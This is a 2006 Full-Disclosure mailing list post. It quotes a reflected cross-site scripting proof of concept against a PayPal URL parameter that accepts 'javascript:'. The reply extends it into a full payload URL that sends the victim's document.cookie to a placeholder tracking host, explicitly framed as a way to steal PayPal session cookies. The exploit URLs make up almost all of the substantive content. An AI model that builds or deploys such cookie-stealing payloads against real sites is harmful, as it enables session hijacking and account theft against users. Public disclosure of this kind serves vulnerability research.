[Full-disclosure] alert()
Matthew Flaschen
matthew.flaschen at gatech.edu
Sun Nov 5 00:33:08 GMT 2006
Good find. How about using it to steal the entire PayPal cookie, though:
https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location=%22http://fooHost/tracker.php?%22%2Bdocument.cookie;
auto113922 at hush.ai wrote:
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-
> outside&voice=javascript:document.write('heh');alert('bl00p');
>
>
>
> Concerned about your privacy? Instantly send FREE secure email, no account required
> http://www.hushmail.com/send?l=480
>
> Get the best prices on SSL certificates from Hushmail
> https://www.hushssl.com?l=485
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 250 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061104/282f2d44/attachment.bin
Full-Disclosure is hosted and sponsored by Secunia.